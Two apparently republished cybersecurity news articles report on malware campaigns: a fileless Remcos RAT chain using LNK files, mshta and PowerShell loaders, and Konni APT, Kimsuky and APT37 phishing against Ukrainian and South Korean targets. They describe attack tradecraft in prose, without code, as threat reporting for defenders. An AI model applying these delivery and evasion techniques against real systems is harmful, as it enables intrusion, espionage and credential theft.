May 16, 2025Ravie LakshmananMalware / Cyber Attack Cybersecurity researchers have shed light on a new malware campaign that makes use of a PowerShell-based shellcode loader to deploy a remote access trojan called Remcos RAT. "Threat actors delivered malicious LNK files embedded within ZIP archives, often disguised as Office documents," Qualys security researcher Akshay Thorve said in a technical report. "The attack chain leverages mshta.exe for proxy execution during the initial stage." The latest wave of attacks, as detailed by Qualys, employs tax-related lures to entice users into opening a malicious ZIP archive containing a Windows shortcutfile, which, in turn, makes use of mshta.exe, a legitimate Microsoft tool used to run HTML Applications. The binary is used to execute an obfuscated HTA file named "xlab22.hta" hosted on a remote server, which incorporates Visual Basic Script code to download a PowerShell script, a decoy PDF, and another HTA file similar to xlab22.hta called "311.hta." The HTA file is also configured to make Windows Registry modifications to ensure that "311.hta" is automatically launched upon system startup. Once the PowerShell script is executed, it decodes and reconstructs a shellcode loader that ultimately proceeds to launch the Remcos RAT payload entirely in memory. Remcos RAT is a well-known malware that offers threat actors full control over compromised systems, making it an ideal tool for cyber espionage and data theft. A 32-bit binary compiled using Visual Studio C++ 8, it features a modular structure and can gather system metadata, log keystrokes, capture screenshots, monitor clipboard data, and retrieve a list of all installed programs and running processes. In addition, it establishes a TLS connection to a command-and-controlserver at "readysteaurantscom," maintaining a persistent channel for data exfiltration and control. This is not the first time fileless versions of Remcos RAT have been spotted in the wild. In November 2024, Fortinet FortiGuard Labs detailed a phishing campaign that filelessly deployed the malware by making use of order-themed lures. What makes the attack method attractive to threat actors is that it allows them to operate undetected by many traditional security solutions as the malicious code runs directly in the computer's memory, leaving very few traces on the disk. "The rise of PowerShell-based attacks like the new Remcos RAT variant demonstrates how threat actors are evolving to evade traditional security measures," J Stephen Kowski, Field CTO at SlashNext, said. "This fileless malware operates directly in memory, using LNK files and MSHTA.exe to execute obfuscated PowerShell scripts that can bypass conventional defenses. Advanced email security that can detect and block malicious LNK attachments before they reach users is crucial, as is real-time scanning of PowerShell commands for suspicious behaviors." The disclosure comes as Palo Alto Networks Unit 42 and Threatray detailed a new .NET loader that's used to detonate a wide range of commodity information stealers and RATS like Agent Tesla, NovaStealer, Remcos RAT, VIPKeylogger, XLoader, and XWorm. The loader features three stages that work in tandem to deploy the final-stage payload: A .NET executable that embeds the second and third stages in encrypted form, a .NET DLL that decrypts and loads the next stage, and a .NET DLL that manages the deployment of the main malware. "While earlier versions embedded the second stage as a hardcoded string, more recent versions use a bitmap resource," Threatray said. "The first stage extracts and decrypts this data, then executes it in memory to launch the second stage." Unit 42 described the use of bitmap resources to conceal malicious payloads a a steganography technique that can bypass traditional security mechanisms and evade detection. The findings also coincide with the emergence of several phishing and social engineering campaigns that are engineered for credential theft and malware delivery - Use of trojanized versions of the KeePass password management software – codenamed KeeLoader – to drop a Cobalt Strike beacon and steal sensitive KeePass database data, including administrative credentials. The malicious installers are hosted on KeePass typosquat domains that are served via Bing ads. Use of ClickFix lures and URLs embedded within PDF documents and a series of intermediary dropper URLs to deploy Lumma Stealer. Use of booby-trapped Microsoft Office documents that are used to deploy the Formbook information stealer protected using a malware distribution service referred to as Horus Protector. Use of blob URIs to locally loads a credential phishing page via phishing emails, with the blob URIs served using allow-listed pagesthat are abused to redirect victims to a malicious site that contains a link to a threat actor-controlled HTML page. Use of RAR archives masquerading as setup files to distribute NetSupport RAT in attacks targeting Ukraine and Poland. Use of phishing emails to distribute HTML attachments that contain malicious code to capture victims' Outlook, Hotmail, and Gmail credentials and exfiltrate them to a Telegram bot named "Blessed logs" that has been active since February 2025 The developments have also been complemented by the rise in artificial intelligence-powered campaigns that leverage polymorphic tricks that mutate in real-time to sidestep detection efforts. These include modifying email subject lines, sender names, and body content to slip past signature-based detection. "AI gave threat actors the power to automate malware development, scale attacks across industries, and personalize phishing messages with surgical precision," Cofense said. "These evolving threats are increasingly able to bypass traditional email filters, highlighting the failure of perimeter-only defenses and the need for post-delivery detection. It also enabled them to outmaneuver traditional defenses through polymorphic phishing campaigns that shift content on the fly. The result: deceptive messages that are increasingly difficult to detect and even harder to stop." Found this article interesting? Follow us on Twitter  and LinkedIn to read more exclusive content we post. SHARE     #fileless #remcos #rat #delivered #via

May 13, 2025Ravie LakshmananCyber Espionage / Malware The North Korea-linked threat actor known as Konni APT has been attributed to a phishing campaign targeting government entities in Ukraine, indicating the threat actor's targeting beyond Russia. Enterprise security firm Proofpoint said the end goal of the campaign is to collect intelligence on the "trajectory of the Russian invasion." "The group's interest in Ukraine follows historical targeting of government entities in Russia for strategic intelligence gathering purposes," security researchers Greg Lesnewich, Saher Naumaan, and Mark Kelly said in a report shared with The Hacker News. Konni APT, also known as Opal Sleet, Osmium, TA406, and Vedalia, is a cyber espionage group that has a history of targeting entities in South Korea, the United States, and Russia. It's operational since at least 2014. Attack chains mounted by the threat actor often involve the use of phishing emails to distribute malware called Konni RAT (aka UpDog) and redirect recipients to credential harvesting pages. Proofpoint, in an analysis of the threat group published in November 2021, assessed TA406 to be one of several actors that make up the activity publicly tracked as Kimsuky, Thallium, and Konni Group. The latest set of attacks documented by the cybersecurity company entails the use of phishing emails that impersonate a fictitious senior fellow at a think tank called the Royal Institute of Strategic Studies, which is also a non-existent organization. The email messages contain a link to a password-protected RAR archive that's hosted on the MEGA cloud service. Opening the RAR archive using a password mentioned in the message body launches an infection sequence that's engineered to conduct extensive reconnaissance of the compromised machines. Specifically, present within the RAR archive is a CHM file that displays decoy content related to former Ukrainian military leader Valeriy Zaluzhnyi. Should the victim click anywhere on the page, a PowerShell command embedded within the HTML is executed to reach out to an external server and download a next-stage PowerShell payload. The newly launched PowerShell script is capable of executing various commands to gather information about the system, encode it using Base64-encoding, and send it to the same server. "The actor sent multiple phishing emails on consecutive days when the target did not click the link, asking the target if they had received the prior emails and if they would download the files," the researchers said. Proofpoint said it also observed an HTML file being directly distributed as an attachment to the phishing messages. In this variation of the attack, the victim is instructed to click on an embedded link in the HTML file, resulting in the download of a ZIP archive that includes a benign PDF and a Windows shortcut (LNK) file. When the LNK is run, it executes Base64-encoded PowerShell to drop a Javascript Encoded file called "Themes.jse" using a Visual Basic Script. The JSE malware, in turn, contacts an attacker-controlled URL and runs the response from the server via PowerShell. The exact nature of the payload is currently not known. Furthermore, TA406 has been spotted attempting to harvest credentials by sending fake Microsoft security alert messages to Ukrainian government entities from ProtonMail accounts, warning them of suspicious sign-in activity from IP addresses located in the United States and urging them to verify the login by visiting a link. While the credential harvesting page has not been recovered, the same compromised domain is said to have been used in the past to collect Naver login information. "These credential harvesting campaigns took place prior to the attempted malware deployments and targeted some of the same users later targeted with the HTML delivery campaign," Proofpoint said. "TA406 is very likely gathering intelligence to help North Korean leadership determine the current risk to its forces already in the theatre, as well as the likelihood that Russia will request more troops or armaments." "Unlike Russian groups who have likely been tasked with gathering tactical battlefield information and targeting of Ukrainian forces in situ, TA406 has typically focused on more strategic, political intelligence collection efforts." The disclosure comes as the Konni group has been linked to a sophisticated multi-stage malware campaign targeting entities in South Korea with ZIP archives containing LNK files, which run PowerShell scripts to extract a CAB archive and ultimately deliver batch script malware capable of collecting sensitive data and exfiltrating it to a remote server. The findings also dovetail with spear-phishing campaigns orchestrated by Kimsuky to target government agencies in South Korea by delivering a stealer malware capable of establishing command-and-control (C2 or C&C) communications and exfiltrating files, web browser data, and cryptocurrency wallet information. According to South Korean cybersecurity company AhnLab, Kimsuky has also been observed propagating PEBBLEDASH as part of a multi-stage infection sequence initiated via spear-phishing. The trojan was attributed by the U.S. government to the Lazarus Group in May 2020. "While the Kimsuky group uses various types of malware, in the case of PEBBLEDASH, they execute malware based on an LNK file by spear-phishing in the initial access stage to launch their attacks," it said. "They then utilize a PowerShell script to create a task scheduler and register it for automatic execution. Through communication with a Dropbox and TCP socket-based C&C server, the group installs multiple malware and tools including PEBBLEDASH." Konni and Kimsuky are far from the only North Korean threat actors to focus on Seoul. As recently as March 2025, South Korean entities have been found to be at the receiving end of another campaign carried out by APT37, which is also referred to as ScarCruft. Dubbed Operation ToyBox Story, the spear-phishing attacks singled out several activists focused on North Korea, per the Genians Security Center (GSC). The first observed spear phishing attack occurred on March 8, 2025. "The email contained a Dropbox link leading to a compressed archive that included a malicious shortcut (LNK) file," the South Korean company said. "When extracted and executed, the LNK file activated additional malware containing the keyword 'toy.'" The LNK files are configured to launch a decoy HWP file and run PowerShell commands, leading to the execution of files named toy03.bat, toy02.bat, and toy01.bat (in that order), the last of which contains shellcode to launch RoKRAT, a staple malware associated with APT37. RokRAT is equipped to collect system information, capture screenshots, and use three different cloud services, including pCloud, Yandex, and Dropbox for C2. "The threat actors exploited legitimate cloud services as C2 infrastructure and continued to modify shortcut (LNK) files while focusing on fileless attack techniques to evade detection by antivirus software installed on target endpoints," Genians said. Found this article interesting? Follow us on Twitter  and LinkedIn to read more exclusive content we post. SHARE     المصدر: https://thehackernews.com/2025/05/north-korean-konni-apt-targets-ukraine.html #North #Korean #Konni #APT #Targets #Ukraine #with #Malware #track #Russian #Invasion #Progress